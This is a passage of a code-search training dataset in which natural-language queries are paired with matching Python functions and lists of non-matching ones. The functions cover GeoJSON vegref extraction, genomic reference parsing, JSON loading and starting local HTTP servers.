| query (string, 9–9.05k chars) | document (string, 10–222k chars) | negatives (list, 19–20 items) | metadata (dict) |
|---|---|---|---|
Returns a list of the from_vegref values extracted from the converted DAU data.
|
def get_from_vegref(file_name_path):
    open_data = json.load(open(file_name_path))
    from_vegrefs = []
    for feature in open_data["features"]:
        properties = feature["properties"]
        from_vegrefs.append(str(properties["from_vegref"]))
    return convert_vegref(from_vegrefs)
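
As an aside, a minimal usage sketch of the function above; the GeoJSON layout, the file name and the convert_vegref stub are assumptions made for illustration, not part of this dataset:

import json

def convert_vegref(vegrefs):
    # hypothetical stand-in for the real conversion routine
    return [ref.strip().upper() for ref in vegrefs]

# hypothetical converted-DAU file: each feature carries a "from_vegref" property
example = {"features": [
    {"properties": {"from_vegref": "1600 ev134 hp3 m2000"}},
    {"properties": {"from_vegref": "1600 ev134 hp3 m2500"}},
]}
with open("dau_converted.json", "w") as f:
    json.dump(example, f)

print(get_from_vegref("dau_converted.json"))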
|
[
"def get_to_vegref(file_name_path):\n open_data = json.load(open(file_name_path))\n to_vegrefs = []\n\n for feature in open_data[\"features\"]:\n properties = feature[\"properties\"]\n to_vegrefs.append(str(properties[\"to_vegref\"]))\n return convert_vegref(to_vegrefs)",
"def get_reference(self):\n field_list = [field for field in self.fields if field.startswith('select_reference_')]\n field_list.sort(key=lambda x: (x.split('_')[-2], x.split('_')[-1]))\n results = {}\n for field in field_list:\n i_dataset = field.split('_')[-2]\n if i_dataset not in results:\n results[i_dataset] = [self.fields[field].initial]\n else:\n results[i_dataset].append(self.fields[field].initial)\n results_list = [[k, v] for k, v in results.items()]\n results_list.sort(key=lambda x: x[0])\n return [v for k, v in results_list]",
"def getVONamesFromUsageRecord(ure):\n # for some reason the followng fails :-/\n # >>> ur.getroot().findall(VO_NAME)\n # so we do it the silly way and iterate over the tree instead.\n\n vos = []\n for e in ure.getroot():\n if e.tag == ur.USER_IDENTITY:\n for f in e:\n if f.tag == ur.VO:\n for g in f:\n if g.tag == ur.VO_NAME:\n vos.append(g.text)\n return vos",
"def parseRefSeq(RefseqToEntrez):\n\tconvert = []\n\tx = open(RefseqToEntrez)\n\tfor line in x:\n\t\tline = line.rstrip(\"\\n\")\n\t\tline = line.split(\"\\t\")\n\t\tif (line[0] == \"#RefSeq_ID\"):\n\t\t\tcontinue\n\t\tconvert.append(line)\n\tx.close()\n\treturn (convert)",
"def __dfsify_branch_uv(u, v, dfs_data):\n buv = B(u, v, dfs_data)\n new_list = []\n for edge_id in buv:\n edge = dfs_data['graph'].get_edge(edge_id)\n j, k = edge['vertices']\n d_x = D(j, dfs_data)\n d_y = D(k, dfs_data)\n if d_x < d_y:\n smaller = d_x\n larger = d_y\n else:\n smaller = d_y\n larger = d_x\n frond = (smaller, larger)\n new_list.append(frond)\n return new_list",
"def getUVs(self):\n if self.uvs:\n for uv in self.uvs:\n yield uv.u, uv.v\n elif self.uvsData:\n for uv in self.uvsData.uvs:\n yield uv.u, 1.0 - uv.v # OpenGL fix!",
"def get_lux_referencedata(ref_path=None):\n if ref_path == None:\n ref_path = '//ewtl2/work/_EWTL Software/Python/Reference data/'\n Lux_10 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=7, skip_footer=421,\n usecols=(0, 1), unpack=True)\n Lux_1 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=32, skip_footer=402,\n usecols=(0, 1), unpack=True)\n Lux_01 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=51,\n skip_footer=388, usecols=(0, 1), unpack=True)\n Lux_001 = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=65,\n skip_footer=375, usecols=(0, 1), unpack=True)\n Lux_obs_smooth = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=78,\n skip_footer=317, usecols=(0, 1), unpack=True)\n Lux_obs_rough = np.genfromtxt(ref_path + 'Lux_data.dat', skip_header=136,\n skip_footer=276, usecols=(0, 1), unpack=True)\n\n return Lux_10, Lux_1, Lux_01, Lux_001, Lux_obs_smooth, Lux_obs_rough",
"def resolveVariant(self,ref,alt,start,chrom):\n\n ref_end = start + len(ref)\n alt_end = start + len(alt)\n\n if chrom[start:ref_end] == ref: \n return [True,ref,alt,'',0]\n elif chrom[start:alt_end] == alt:\n return [True,alt,ref,'ref_alt_rev',1] \n elif ref != '-' and chrom[start:ref_end] == Seq(ref).reverse_complement().tostring():\n ref = Seq(ref).reverse_complement().tostring()\n alt = Seq(alt).reverse_complement().tostring()\n return [True,ref,alt,'neg_strand',2] \n elif alt != '-' and chrom[start:alt_end] == Seq(alt).reverse_complement().tostring():\n ref = Seq(ref).reverse_complement().tostring()\n alt = Seq(alt).reverse_complement().tostring()\n return [True,alt,ref,'neg_strand_ref_alt_rev',3] \n else:\n refStart = start - 5\n refStop = max(ref_end,alt_end) + 6\n print ref+'\\t'+alt+'\\t'+str(start)+'\\t'+ str(ref_end)+'\\t'+str(alt_end)+'\\t'\n #return [False,ref,alt,'unknown - ref:'+chrom[start:max(ref_end,alt_end)],-1 ]\n return [False,ref,alt,'unknown - ref:'+chrom[start-5:start+6],-1 ]",
"def get_vtu_ref(flml_file):\n \n tree = ET.parse(flml_file+'.flml')\n root = tree.getroot()\n\n res = root.find('material_phase').find('scalar_field').find('prognostic').find('initial_condition').find('from_file').get('file_name')\n\n return res",
"def get_turb_referencedata(component, ref_path=None):\n if ref_path == None:\n ref_path = '//ewtl2/work/_EWTL Software/Python/Reference data/'\n ### READ turbulence intensity - reference: VDI\n if component == 'I_u':\n I_u_slight = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=11,\n skip_footer=367, usecols=(0, 1), unpack=True, encoding='latin1')\n I_u_moderate = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=41,\n skip_footer=337, usecols=(0, 1), unpack=True, encoding='latin1')\n I_u_rough = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=69,\n skip_footer=310, usecols=(0, 1), unpack=True, encoding='latin1')\n I_u_very = np.genfromtxt(ref_path + 'Iu_data.dat', skip_header=103,\n skip_footer=269, usecols=(0, 1), unpack=True, encoding='latin1')\n\n return I_u_slight, I_u_moderate, I_u_rough, I_u_very\n\n if component == 'I_v':\n I_v_slight = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=7,\n skip_footer=40, usecols=(0, 1), unpack=True, encoding='latin1')\n I_v_moderate = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=20,\n skip_footer=29, usecols=(0, 1), unpack=True, encoding='latin1')\n I_v_rough = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=31,\n skip_footer=15, usecols=(0, 1), unpack=True, encoding='latin1')\n I_v_very = np.genfromtxt(ref_path + 'Iv_data.dat', skip_header=45,\n skip_footer=0, usecols=(0, 1), unpack=True, encoding='latin1')\n\n return I_v_slight, I_v_moderate, I_v_rough, I_v_very\n\n if component == 'I_w':\n I_w_slight = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=11,\n skip_footer=347, usecols=(0, 1), unpack=True, encoding='latin1')\n I_w_moderate = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=37,\n skip_footer=321, usecols=(0, 1), unpack=True, encoding='latin1')\n I_w_rough = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=63,\n skip_footer=295, usecols=(0, 1), unpack=True, encoding='latin1')\n I_w_very = np.genfromtxt(ref_path + 'Iw_data.dat', skip_header=89,\n skip_footer=269, usecols=(0, 1), unpack=True, encoding='latin1')\n\n return I_w_slight, I_w_moderate, I_w_rough, I_w_very",
"def _makeDataRefList(self, namespace):\n keysCoadd = namespace.butler.getKeys(datasetType=namespace.config.coaddName + \"Coadd\",\n level=self._dataRefLevel)\n keysCoaddTempExp = namespace.butler.getKeys(datasetType=namespace.config.coaddName + \"Coadd_tempExp\",\n level=self._dataRefLevel)\n\n if namespace.config.doMatchBackgrounds:\n if namespace.config.autoReference: #matcher will pick it's own reference image\n namespace.datasetType = namespace.config.coaddName + \"Coadd\"\n validKeys = keysCoadd\n else:\n namespace.datasetType = namespace.config.coaddName + \"Coadd_tempExp\"\n validKeys = keysCoaddTempExp\n else: #bkg subtracted coadd\n namespace.datasetType = namespace.config.coaddName + \"Coadd\"\n validKeys = keysCoadd\n\n namespace.dataRefList = []\n for dataId in namespace.dataIdList:\n # tract and patch are required\n for key in validKeys:\n if key not in dataId:\n self.error(\"--id must include \" + key)\n\n for key in dataId: # check if users supplied visit/run\n if (key not in keysCoadd) and (key in keysCoaddTempExp): #user supplied a visit/run\n # user probably meant: autoReference = False\n namespace.config.autoReference = False\n namespace.datasetType = namespace.config.coaddName + \"Coadd_tempExp\"\n print \"Switching config.autoReference to False. \" \\\n \"Applies only to background Matching. \"\n\n dataRef = namespace.butler.dataRef(\n datasetType = namespace.datasetType,\n dataId = dataId,\n )\n namespace.dataRefList.append(dataRef)",
"def get_vep_df_for_vcf_df(vcf_df, outdir, reference_genome, gff_with_biotype, mitochondrial_chromosome, mitochondrial_code, gDNA_code, replace):\n\n # define the prefix\n prefix = \"%s/vep_%i_to_%i\"%(outdir, vcf_df.index[0], vcf_df.index[-1])\n\n # define the vcf file\n vcf_file = \"%s_variants.vcf\"%prefix\n\n # define the annotated_vcf \n annotated_vcf = \"%s_annotated.tab\"%vcf_file; annotated_vcf_tmp = \"%s.tmp\"%annotated_vcf\n\n if file_is_empty(annotated_vcf) or replace is True:\n print_if_verbose(\"running vep for %s\"%vcf_file)\n\n # clean previous files\n for f in os.listdir(outdir):\n path = \"%s/%s\"%(outdir, f)\n if path.startswith(prefix) and path!=annotated_vcf: remove_file(path)\n\n # generate the raw vcf\n vcf_df.to_csv(vcf_file, sep=\"\\t\", index=False, header=True)\n\n # run vep for this vcf\n vep_std = \"%s_annotating_vep.std\"%prefix\n vep_cmd = \"%s --input_vcf %s --outfile %s --ref %s --gff %s --mitochondrial_chromosome %s --mito_code %i --gDNA_code %i\"%(run_vep, vcf_file, annotated_vcf_tmp, reference_genome, gff_with_biotype, mitochondrial_chromosome, mitochondrial_code, gDNA_code)\n \n if log_file_all_cmds is not None: vep_cmd += \" --log_file_all_cmds %s\"%log_file_all_cmds\n vep_cmd += \" > %s 2>&1\"%vep_std\n run_cmd(vep_cmd)\n\n # print a warning if all the variants are intergenic\n df_vep = pd.read_csv(annotated_vcf_tmp, sep=\"\\t\")\n if all(df_vep.Consequence==\"intergenic_variant\"): print_with_runtime(\"!!!! WARNING !!!!! All the variants annotated by VEP are intergenic for a chunk of variants (those from '%s'). This suggests that the input files may not be properly formatted. If all the chunks are like this you can probably not trust the output\"%prefix)\n\n # check that the std contains no signs of compressing the gff\n if any([\"compressing gff before running vep\" in l for l in open(vep_std, \"r\").readlines()]): raise ValueError(\"There was a compression of the gff before running vep. This is not acceptable when running in parallel\") \n\n # print the VEP warnings, which can be useful to debug\n vep_warnings = \"\".join([l for l in open(vep_std, \"r\").readlines() if \"WARNING\" in l.upper()])\n if len(vep_warnings)>0: print_with_runtime(\"\\n---There are WARNING's in VEP:\\n%s\\n---\"%(vep_warnings))\n\n remove_file(vep_std)\n\n # keep\n os.rename(annotated_vcf_tmp, annotated_vcf)\n\n # remove all the files that are related to this prefix\n for f in os.listdir(outdir):\n path = \"%s/%s\"%(outdir, f)\n if path.startswith(prefix) and path!=annotated_vcf: remove_file(path)\n\n # load the vep df\n df_vep = pd.read_csv(annotated_vcf, sep=\"\\t\")\n\n return df_vep",
"def fasta2vcf(f):\r\n\tmy_dict = {}\r\n\tfor r in SeqIO.parse(f, \"fasta\"):\r\n\t\tmy_dict[r.id] = str(r.seq).upper()\r\n\tprint (my_dict)\r\n\tvcf = pd.DataFrame()\r\n\tindex_list = []\r\n\tchr_list = []\r\n\tpos_list = []\r\n\tref_list = []\r\n\talt_list = []\r\n\tseq_list = []\r\n\tfor k in my_dict:\r\n\t\tif not \"_ref\" in k:\r\n\t\t\tcontinue\r\n\t\tname = k.replace(\"_ref\",\"\")\r\n\t\tif not name+\"_alt\" in my_dict:\r\n\t\t\tprint (k,\"alt sequence not found. Please use _ref and _alt keywords. Skip...\")\r\n\t\t\tcontinue\r\n\t\tref_seq,alt_seq = my_dict[k],my_dict[name+\"_alt\"]\r\n\t\tif len(ref_seq) < 30:\r\n\t\t\tprint (k,\"Please input sequence length at least 30bp. Skip...\")\r\n\t\t\tcontinue\r\n\t\tif ref_seq == alt_seq:\r\n\t\t\tprint (k,\"Ref and Alt sequence is the same. Please check. Skip...\")\r\n\t\t\tcontinue\r\n\t\tpos,ref,alt = find_pos_ref_alt(ref_seq,alt_seq)\r\n\t\tindex_list.append(name)\r\n\t\tchr_list.append(k)\r\n\t\tseq_list.append(ref_seq)\r\n\t\tpos_list.append(pos)\r\n\t\tref_list.append(ref)\r\n\t\talt_list.append(alt)\r\n\tvcf[0] = chr_list\r\n\tvcf[1] = pos_list\r\n\tvcf[2] = index_list\r\n\tvcf[3] = ref_list\r\n\tvcf[4] = alt_list\r\n\tvcf[5] = seq_list\r\n\tvcf = vcf[vcf[1]!=-1]\r\n\tif vcf.shape[0] == 0:\r\n\t\tprint (\"no valid sequences in:\",f)\r\n\t\tprint (\"Exit...\")\r\n\t\tsys.exit(1)\r\n\r\n\treturn vcf",
"def DMI_refet_data(self, data):\n self.refet_df = None\n if '%p' in data.refet['name_format']:\n refet_path = os.path.join(data.refet['ws'], data.refet['name_format'].replace('%p', data.refet['fnspec']))\n else:\n refet_path = os.path.join(data.refet['ws'], data.refet['name_format'])\n if not os.path.isfile(refet_path):\n logging.error('ERROR: Reference ET data path {0} does not exist'.format(refet_path))\n return False\n logging.debug(' Reference ET path is {0}'.format(refet_path))\n if data.refet['data_structure_type'].upper() == 'PF S.P':\n if data.refet['file_type'].lower() == 'csf':\n param_df = mod_dmis.ReadOneColumnSlot(\n refet_path, data.refet['header_lines'], data.refet['names_line'],\n self.refet_id, data.refet['fields']['etref'], data.refet['units']['etref'], 1.0,\n 'day', 1, data.refet['delimiter'], data.start_dt, data.end_dt)\n elif data.refet['file_type'].lower() == 'rdb':\n param_df = mod_dmis.ReadOneTextRDB(\n refet_path, data.refet['header_lines'], data.refet['names_line'],\n self.refet_id, data.refet['fields']['etref'], data.refet['units']['etref'], 1.0,\n 'day', 1, data.refet['delimiter'], data.start_dt, data.end_dt)\n elif data.refet['file_type'].lower() == 'xls' or data.refet['file_type'].lower() == 'wb':\n param_df = mod_dmis.ReadOneExcelColumn(\n refet_path, data.refet['wsspec'], data.refet['header_lines'], data.refet['names_line'],\n self.refet_id, data.refet['fields']['etref'], data.refet['units']['etref'], 1.0,\n 'day', 1, data.start_dt, data.end_dt)\n else:\n logging.error('ERROR: File type {} is not supported'.format(data.refet['file_type']))\n return False\n if param_df is None:\n logging.error('ERROR: unable to read {}'.format(refet_path))\n return False\n else:\n self.refet_df = mod_dmis.make_ts_dataframe('day', 1, data.start_dt, data.end_dt)\n self.refet_df['etref'] = param_df[[0]].values\n return True",
"def get_feature_vector(self,gesture):\n vector = []\n for generator in feature_generators:\n vector.append(generator(gesture))\n\n return [i for i in utils.flatten(vector)]",
"def _parse_lovd_variants_by_gene_name_response(xml_blob):\n entries = xmltodict.parse(xml_blob)['feed']['entry']\n out = []\n for entry in entries:\n out.append(_parse_entry(entry))\n return out",
"def collect_ref_data(app, doctree):\n filename = doctree.attributes[\"source\"]\n\n # this needs to happen to make this work with sphinx-multiversion\n metadata = app.config.smv_metadata or {}\n current_version = app.config.smv_current_version\n if metadata and current_version:\n sourcedir = metadata.get(current_version, {}).get(\"sourcedir\")\n if sourcedir and filename.startswith(sourcedir):\n filename = filename[len(sourcedir) :]\n\n # otherwise lets just split off the current directory (not sphinx multiversion)\n filename = filename.replace(docs_dir, \"\").lstrip(\"/\")\n docname = filename.replace(\".md\", \"\")\n\n anchors = []\n references = []\n\n for node in doctree.traverse(nodes.raw):\n if \"name=\" in node.rawsource:\n match = re.search(r'name=\"([^\\\"]+)', node.rawsource)\n if match:\n anchors.append(match.group(1))\n elif \"id=\" in node.rawsource:\n match = re.search(r'id=\"([^\\\"]+)', node.rawsource)\n if match:\n anchors.append(match.group(1))\n\n for node in doctree.traverse(nodes.section):\n for target in frozenset(node.attributes.get(\"ids\", [])):\n anchors.append(target)\n\n for node in doctree.traverse(nodes.reference):\n uri = node.get(\"refuri\")\n if uri and not uri.startswith((\"http://\", \"https://\")):\n ref = to_reference(uri, basedoc=docname)\n references.append(ref)\n\n app.env.metadata[docname][\"anchors\"] = anchors\n app.env.metadata[docname][\"references\"] = references",
"def _get_ref(self):\n reference = []\n for concentration, ingredient in zip(\n self.concentrations, self.ingredients):\n if ingredient.role != 'Solvent':\n for fragment in ingredient.fragments:\n reference.append(fragment.symbol.lower())\n reference.append(str(round(concentration, 2)))\n\n return '-'.join(reference)",
"def G4_list(self):\n with open(self.G4_path, 'r') as f0:\n lines = f0.readlines()\n g4_ls = []\n for line in lines:\n line = line.strip()\n line = line.split('\\t')\n if line[6][0] == 'G':\n g4_ls.append(line[6])\n else:\n g4_ls.append(reverse_comp(line[6]))\n return g4_ls"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Returns a list containing the to_vegref data from a JSON file.
|
def get_to_vegref(file_name_path):
    open_data = json.load(open(file_name_path))
    to_vegrefs = []
    for feature in open_data["features"]:
        properties = feature["properties"]
        to_vegrefs.append(str(properties["to_vegref"]))
    return convert_vegref(to_vegrefs)
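
Since this mirrors get_from_vegref above, the two could share one parameterised helper; a sketch, assuming the same convert_vegref helper is available (the name extract_vegrefs is hypothetical):

import json

def extract_vegrefs(file_name_path, key):
    # key is either "from_vegref" or "to_vegref"
    with open(file_name_path) as f:
        data = json.load(f)
    return convert_vegref([str(feature["properties"][key]) for feature in data["features"]])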
|
[
"def get_from_vegref(file_name_path):\n\n open_data = json.load(open(file_name_path))\n from_vegrefs = []\n\n for feature in open_data[\"features\"]:\n properties = feature[\"properties\"]\n from_vegrefs.append(str(properties[\"from_vegref\"]))\n return convert_vegref(from_vegrefs)",
"def jsonToList( f ):\n\tresults = []\n\tfor line in f:\n\t\tresults.append( json.loads( line ) )\n\treturn results",
"def load_event_gtracks_json(path : str)->List[GTracks]:\n # First load the json object from file\n\n with open(path) as json_file:\n jdevt = json.load(json_file)\n\n # then recreate the list of GTracks\n ETRKS = []\n for _, dGtrk in jdevt.items():\n GTRKS = []\n dgtrk = dGtrk['gtrk']\n event_id = dGtrk['event_id']\n voxel_bin = dGtrk['voxel_bin']\n contiguity = dGtrk['contiguity']\n\n for it, value in dgtrk.items():\n gt = nx.node_link_graph(value)\n GTRKS.append(GTrack(gt,\n event_id[it],\n voxel_bin[it],\n contiguity[it]))\n ETRKS.append(GTRKS)\n return ETRKS",
"def json2log():\r\n with open(json_file, 'r') as f:\r\n return json.load(f)",
"def get_lists_from_file(file_name: str) -> List:\n list_url_file = pathlib.Path.home().joinpath('bookshelf', file_name)\n if not list_url_file.is_file():\n return []\n # open file and load contents\n with list_url_file.open(mode='r') as f:\n list_urls = json.load(f)\n return list_urls",
"def getLocationData(self, filepath):\n geoData = []\n files = os.listdir(filepath)\n for afile in files:\n with open(filepath+afile) as r:\n data = json.loads(r.read())\n for entry in data:\n geoData.append(entry)\n return geoData",
"def _read_vecjson(jsonfname):\n with open(jsonfname) as data_file:\n data = json.load(data_file)\n for nm in ['body2head_rotmat', 'body2head_vec']:\n if nm in data:\n data[nm] = np.array(data[nm])\n return data",
"def urls_from_json(self, json_file_):\n\n try:\n json_data_ = helper.READ_JSON_FILE(json_file_)\n urls_ = {}\n for entry_ in json_data_:\n urls_[entry_['attachment']['href']] = entry_['created_time']\n\n return urls_\n except Exception:\n self._logger.log_error(\"Error parsing JSON\", traceback.format_exc())\n temp_ = {}\n return temp_",
"def from_json(json_file):\n with open(json_file) as inputfile:\n calendar = json.load(inputfile)\n\n vcalendars = []\n\n for rdv in calendar:\n vcal = \"BEGIN:VCALENDAR\\nVERSION:2.0\\nPRODID:-//Orage Project//Framagenda//FR\\n\"\n vcal += \"BEGIN:VEVENT\\n\"\n for key in rdv.keys():\n vcal += str(key) + \":\" + str(rdv[key]) + \"\\n\"\n # Unique ID. If two vevents start at the same time, they are the same vevent, so it is just an update\n vcal += \"UID:orage@{}\\n\".format(rdv[\"DTSTART\"])\n vcal += \"END:VEVENT\\n\"\n vcal += \"END:VCALENDAR\\n\"\n\n vcalendars.append(vcal)\n\n return vcalendars",
"def process_json_file(file_name: str, ids: List[int]) -> List[str]:\n open_file = flip(open, 'r')\n read_file = methodcaller('read')\n to_dict = json.loads\n desired_settlement_type = lambda fee: fee.get('SettlementTypeID') in ids\n\n return list(\n pipe(\n file_name,\n open_file,\n read_file,\n to_dict,\n get('fees'),\n filter(desired_settlement_type),\n map(generate_fee_assertions),\n )\n )",
"def gen_fjson(filename):\n with open(filename) as f:\n for line in f:\n try:\n yield json.loads(line)\n except:\n pass",
"def load_json_points(js):\r\n align_js = js['belt_alignment']\r\n sources = []\r\n targets = []\r\n for pair in align_js:\r\n src_js = pair['source']\r\n tgt_js = pair['target']\r\n sources.append([float(src_js['y']), float(src_js['x'])])\r\n targets.append([float(tgt_js['y']), float(tgt_js['x'])])\r\n\r\n sources = np.array(sources)\r\n targets = np.array(targets)\r\n return sources, targets",
"def jsonl(filename):\n\twith open(filename, 'r') as file_:\n\t\tfor line in file_:\n\t\t\tyield json.loads(line)",
"def get_rdf_data(file):\n with open(file) as f:\n data = json.load(f)\n return data",
"def FindURLSInJSON(json_file, gs_urls):\n output = subprocess.check_output(['svn', 'cat', json_file])\n json_content = json.loads(output)\n for dict_type in ['actual-results']:\n for result_type in json_content[dict_type]:\n if json_content[dict_type][result_type]:\n for result in json_content[dict_type][result_type].keys():\n hash_type, hash_value = json_content[dict_type][result_type][result]\n gs_url = FileNameToGSURL(result, hash_type, str(hash_value))\n if gs_urls.get(gs_url):\n gs_urls[gs_url].append(json_file)\n else:\n gs_urls[gs_url] = [json_file]",
"def _types_from_JSON(self, filename):\n\t\tfile = open(filename, mode=\"r\", encoding=\"utf-8\")\n\t\ttypes = json.loads(file.read())\n\t\tfile.close()\n\t\treturn types",
"def jsonread(filename): \n res = None",
"def load_from_json(fname):\r\n # TODO make this take a file-like as well\r\n with open(fname, \"r\") as fin:\r\n data = json.load(fin)\r\n\r\n return [StripInfo(**d) for d in data]",
"def get_contents(filename):\n _documents = []\n with open(filename) as f:\n for line in f:\n # Parse document\n doc = json.loads(line)\n # Skip if it is empty or None\n if not doc:\n continue\n # Add the document\n _documents.append((utils.normalize(doc['id']), doc['text']))\n return _documents"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Start SimpleHTTPServer as a background process from rootDir on the given component. The web server will listen on the given port and, if specified, output will be redirected to logDir.
|
def start( self, component, rootDir, port=8000, logDir=None ):
    retValue = main.TRUE
    self.rootDir = rootDir
    try:
        # Save component for this instance so other functions can use it
        self.component = component
        main.log.info( "Starting SimpleHTTPServer on " + component.name )
        if component.handle:
            handle = component.handle
            # cd to rootDir
            handle.sendline( "cd " + str( rootDir ) )
            handle.expect( "\$" )
            # Start server
            cmd = "python -m SimpleHTTPServer {}".format( port )
            if logDir:
                cmd += " &> {}".format( logDir )  # pipe all output to a file
            else:
                cmd += " &> /dev/null"  # Throw away all output
            cmd += " &"
            handle.sendline( cmd )
            handle.expect( "\$" )
            response = handle.before
            # Return to home dir
            handle.sendline( "cd " + component.home )
            handle.expect( "\$" )
            response += handle.before
            if "Exit" in response:
                main.log.error( "Error starting server. Check server log for details" )
                main.log.debug( handle.before )
                retValue = main.FALSE
            # capture PID for later use
            # EX: [1] 67987
            match = re.search( "\[\d\] (?P<PID>\d+)", response )
            if match:
                self.PID = match.group( "PID" )
            else:
                main.log.warn( "Could not find PID" )
        else:
            main.log.error( "Component handle is not set" )
            retValue = main.FALSE
    except Exception:
        main.log.exception( "Error starting web server" )
        retValue = main.FALSE
    return retValue
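
Stripped of the TestON handle plumbing, the launch above boils down to running the module in the background from rootDir and remembering its PID; a stand-alone sketch under that reading (the helper name and default paths are assumptions; the module name differs between Python 2 and 3):

import os
import subprocess

def start_simple_http_server(root_dir, port=8000, log_path=os.devnull):
    # serve root_dir in the background; all output goes to log_path
    log_file = open(log_path, "a")
    proc = subprocess.Popen(
        ["python", "-m", "SimpleHTTPServer", str(port)],  # use "http.server" on Python 3
        cwd=root_dir, stdout=log_file, stderr=subprocess.STDOUT )
    return proc.pid  # analogous to the "[1] 67987" PID captured above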
|
[
"def start():\n port = cfg.web.port\n\n events.dispatcher.register_target(event_logger)\n\n logging.info('Starting web server: port=%d' % port)\n utils.DaemonThread(target=bottle.run,\n kwargs={'host': cfg.web.bind,\n 'port': cfg.web.port}).start()",
"def run(self, host='127.0.0.1', port=5000):\n httpd = wsgiref.simple_server.make_server('', port, self)\n log(\"PWF now running on http://%s:%s/\" % (host, port,))\n httpd.serve_forever()",
"def run(self):\n parts = urlparse(HOST_BASE)\n domain, port = parts.netloc.split(\":\")\n self.srv = make_server(domain, int(port), self.app)\n try:\n self.srv.serve_forever()\n except:\n import traceback\n traceback.print_exc()\n # Failed to start\n self.srv = None",
"def StartHttpServer(local_dir_path, host_port=0):\n assert local_dir_path\n httpd = _SilentTCPServer(('127.0.0.1', host_port),\n _GetHandlerClassForPath(local_dir_path))\n atexit.register(httpd.shutdown)\n\n http_thread = threading.Thread(target=httpd.serve_forever)\n http_thread.daemon = True\n http_thread.start()\n return httpd.server_address",
"def start(self):\n self.log('Server started...')\n self.httpd.serve_forever()",
"def run(self):\n self.server = HTTPServer(('', HttpServer.serverPort), HttpHandler)\n self.server.timeout = HttpServer.timeout\n self.server.msg_queue = self.msg_queue\n logger.warning(\"HTTP server running\")\n try:\n while True:\n self.server.handle_request()\n try:\n msg: HttpMessage = self.msg_queue.get(False)\n self.update_state(msg)\n logger.debug(\"HTTP message received\")\n except Empty:\n pass\n except Exception:\n print(sys.exc_info())\n\n logger.warning(\"HTTP server terminating\")",
"def run() -> None: # pragma: no cover\n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(levelname)s - %(message)s'\n )\n args = parse_user_args()\n config = wsgi_config.WSGIConfig()\n config.configure_gwsgi(args)\n httpd = make_wsgi_server(\n config.host, config.port, config.application,\n config.threading, config.processing, config.wsgiref\n )\n logging.debug(f'WSGIServer: Serving HTTP on port {config.port} ...\\n')\n httpd.serve_forever()",
"def standalone_main(port, static_dir):\n \n # load static files\n static_files = {}\n def static_walker(arg, dirname, names):\n for name in names:\n try:\n path = os.path.join(dirname, name)\n if os.path.isdir(path):\n continue\n uri = os.path.relpath(path, static_dir)\n static_files[\"/static/%s\" % uri] = open(path).read()\n except IOError:\n sys.stderr.write(\n \"* Problem loading %s\\n\" % path\n )\n os.path.walk(static_dir, static_walker, \"\")\n sys.stderr.write(\"* Static files loaded.\\n\")\n\n def red_handler (method, uri, req_hdrs, res_start, req_pause):\n p_uri = urlsplit(uri)\n if static_files.has_key(p_uri.path):\n res_body, res_done = res_start(\"200\", \"OK\", [], nbhttp.dummy)\n res_body(static_files[p_uri.path])\n res_done(None)\n elif p_uri.path == \"/\":\n query_string = cgi.parse_qs(p_uri.query)\n\n def output_hdrs (status, hdrs):\n code, phrase = status.split(None, 1)\n return res_start(code, phrase, hdrs, nbhttp.dummy)\n\n try:\n RedWebUi('/', method, query_string, output_hdrs)\n except:\n sys.stderr.write(\"\"\"\n\n*** FATAL ERROR\nRED has encountered a fatal error which it really, really can't recover from\nin standalone server mode. Details follow.\n\n\"\"\")\n except_handler_factory(sys.stderr.write)()\n sys.stderr.write(\"\\n\")\n nbhttp.stop()\n sys.exit(1)\n else:\n res_body, res_done = res_start(\n \"404\", \"Not Found\", [], nbhttp.dummy\n )\n res_done(None)\n return nbhttp.dummy, nbhttp.dummy\n\n nbhttp.Server(\"\", port, red_handler)\n \n try:\n nbhttp.run()\n except KeyboardInterrupt:\n sys.stderr.write(\"Stopping...\\n\")\n nbhttp.stop()\n # TODO: logging\n # TODO: extra resources",
"def start(self):\n self.httpd = socketserver.ThreadingTCPServer(\n (\"\", self.port), self.handler, False\n )\n self.httpd.request_queue_size = 500\n self.httpd.timeout = 2000\n self.httpd.server_bind()\n self.httpd.server_activate()\n\n if self.cert_filename != \"\" and os.path.isfile(self.cert_filename) and \\\n self.key_filename != \"\" and os.path.isfile(self.key_filename):\n self.httpd.socket = ssl.wrap_socket(\n self.httpd.socket, certfile=self.cert_filename, server_side=True,\n keyfile=self.key_filename\n )\n print(\"start serving\")\n _thread.start_new_thread(self.httpd.serve_forever, ())",
"def runserver():\n from web.server import runserver\n runserver()",
"def start_httpd(addr): # pragma: no cover\n host, port = addr.split(':')\n logging.info('Starting HTTPD on {}:{}'.format(host, port))\n prometheus_client.start_http_server(int(port), host)",
"def serve(self, port=8000):\n \n # Make a HTTP-server from the WSGI-handler\n server = make_server('', port, self.wsgi)\n \n # Run the server until terminated\n server.serve_forever()",
"def runserver():\n typer.echo(\"Starting server...\")\n\n # Webserver config settings\n config = container[Configuration]\n event_loop = container[EventLoopBase]\n hostname = config['app']['hostname'].get()\n port = config['app']['port'].get()\n # Webservice application\n app = fastapi_app\n server_config = Config(app=app, host=hostname, port=port, loop=event_loop.get_loop())\n\n # Initialize the webserver\n uvicorn_server = Server(server_config)\n event_loop.run(uvicorn_server.serve())",
"def main() -> None:\n\n start_server()",
